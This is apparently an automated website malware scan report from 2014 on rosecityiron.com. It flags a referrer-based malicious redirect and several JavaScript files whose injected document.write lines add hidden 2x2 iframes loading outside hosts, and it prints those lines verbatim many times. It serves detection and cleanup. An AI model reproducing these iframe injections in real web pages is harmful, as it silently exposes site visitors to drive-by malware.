Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://rosecityiron.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: rosecityiron.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Sep 2014 09:05:26 GMT Location: http://thegadgetspot.nl/cwhf.html?h=881056 Server: Apache Content-Length: 226 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://rosecityiron.com/ | 200 OK Content-Length: 12438 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?i=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?i=881056> | ||
http://rosecityiron.com/./include/url.js | 200 OK Content-Length: 15901 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); var CM_SESSION_KEY_KEY = "cmSessionKeyKey"; function getSessionPair(loc) { return URL.getSessionPair(loc); } function getSe return true; } return false; } // --------------------------------------------------------------------- function URL_getPrototypePair() { return { url : this.toExternalForm(true), parameters : this.getQueryString() } } // --------------------------------------------------------------------- document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http: Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056> Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> | ||
http://rosecityiron.com/./include/swfobject.js | 200 OK Content-Length: 9315 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gitmom.com/aeed.html?j=881056></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); } if (Array.prototype.push == null) { Array.prototype.push = function(item) { this[this.length] = item; return this.length; }} var getQueryParamValue = deconcept.util.getRequestParameter; var FlashObject = deconcept.SWFObject; var SWFObject = deconcept.SWFObject; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> Hidden iFrame found. size: 2x2 src: http://gitmom.com/aeed.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gitmom.com/aeed.html?j=881056> | ||
http://rosecityiron.com/./include/sitetree.js | 200 OK Content-Length: 6633 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); if (typeof(decodeURIComponent) == 'undefined') { decodeURIComponent = function(s) { return unescape(s); } for (var i=0 ; i < testFor.length ; i++) { var p = theSitetree.getByXx(lookup, testFor[i]); if (p != null) { page = p[POS_HREF]; break; } } } document.location.href = (new URL(__path_prefix__ + page, true, true)).toString(); }; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056> | ||
http://rosecityiron.com/./301.html | 200 OK Content-Length: 12438 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?i=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?i=881056> | ||
http://rosecityiron.com/././include/url.js | 200 OK Content-Length: 15901 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); var CM_SESSION_KEY_KEY = "cmSessionKeyKey"; function getSessionPair(loc) { return URL.getSessionPair(loc); } function getSe return true; } return false; } // --------------------------------------------------------------------- function URL_getPrototypePair() { return { url : this.toExternalForm(true), parameters : this.getQueryString() } } // --------------------------------------------------------------------- document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http: Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056> | ||
http://rosecityiron.com/././include/swfobject.js | 200 OK Content-Length: 9315 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gitmom.com/aeed.html?j=881056></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); } if (Array.prototype.push == null) { Array.prototype.push = function(item) { this[this.length] = item; return this.length; }} var getQueryParamValue = deconcept.util.getRequestParameter; var FlashObject = deconcept.SWFObject; var SWFObject = deconcept.SWFObject; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> Hidden iFrame found. size: 2x2 src: http://gitmom.com/aeed.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gitmom.com/aeed.html?j=881056> Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> | ||
http://rosecityiron.com/././include/sitetree.js | 200 OK Content-Length: 6633 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); if (typeof(decodeURIComponent) == 'undefined') { decodeURIComponent = function(s) { return unescape(s); } for (var i=0 ; i < testFor.length ; i++) { var p = theSitetree.getByXx(lookup, testFor[i]); if (p != null) { page = p[POS_HREF]; break; } } } document.location.href = (new URL(__path_prefix__ + page, true, true)).toString(); }; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056> Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> | ||
http://rosecityiron.com/././301.html | 200 OK Content-Length: 12438 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?i=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?i=881056> | ||
http://rosecityiron.com/./././include/url.js | 200 OK Content-Length: 15901 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); var CM_SESSION_KEY_KEY = "cmSessionKeyKey"; function getSessionPair(loc) { return URL.getSessionPair(loc); } function getSe return true; } return false; } // --------------------------------------------------------------------- function URL_getPrototypePair() { return { url : this.toExternalForm(true), parameters : this.getQueryString() } } // --------------------------------------------------------------------- document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http: Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056> | ||
http://rosecityiron.com/./././include/swfobject.js | 200 OK Content-Length: 9315 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gitmom.com/aeed.html?j=881056></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); } if (Array.prototype.push == null) { Array.prototype.push = function(item) { this[this.length] = item; return this.length; }} var getQueryParamValue = deconcept.util.getRequestParameter; var FlashObject = deconcept.SWFObject; var SWFObject = deconcept.SWFObject; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://gitmom.com/aeed.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gitmom.com/aeed.html?j=881056> Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> | ||
http://rosecityiron.com/./././include/sitetree.js | 200 OK Content-Length: 6633 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); if (typeof(decodeURIComponent) == 'undefined') { decodeURIComponent = function(s) { return unescape(s); } for (var i=0 ; i < testFor.length ; i++) { var p = theSitetree.getByXx(lookup, testFor[i]); if (p != null) { page = p[POS_HREF]; break; } } } document.location.href = (new URL(__path_prefix__ + page, true, true)).toString(); }; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056> | ||
http://rosecityiron.com/./././301.html | 200 OK Content-Length: 12438 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?i=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?i=881056> | ||
http://rosecityiron.com/././././include/url.js | 200 OK Content-Length: 15901 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); var CM_SESSION_KEY_KEY = "cmSessionKeyKey"; function getSessionPair(loc) { return URL.getSessionPair(loc); } function getSe return true; } return false; } // --------------------------------------------------------------------- function URL_getPrototypePair() { return { url : this.toExternalForm(true), parameters : this.getQueryString() } } // --------------------------------------------------------------------- document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http: Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056> | ||
http://rosecityiron.com/././././include/swfobject.js | 200 OK Content-Length: 9315 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gitmom.com/aeed.html?j=881056></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); } if (Array.prototype.push == null) { Array.prototype.push = function(item) { this[this.length] = item; return this.length; }} var getQueryParamValue = deconcept.util.getRequestParameter; var FlashObject = deconcept.SWFObject; var SWFObject = deconcept.SWFObject; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> Hidden iFrame found. size: 2x2 src: http://gitmom.com/aeed.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gitmom.com/aeed.html?j=881056> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rosecityiron.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://rosecityiron.com/
Result: rosecityiron.com is not infected or malware details are not published yet.
Result: rosecityiron.com is not infected or malware details are not published yet.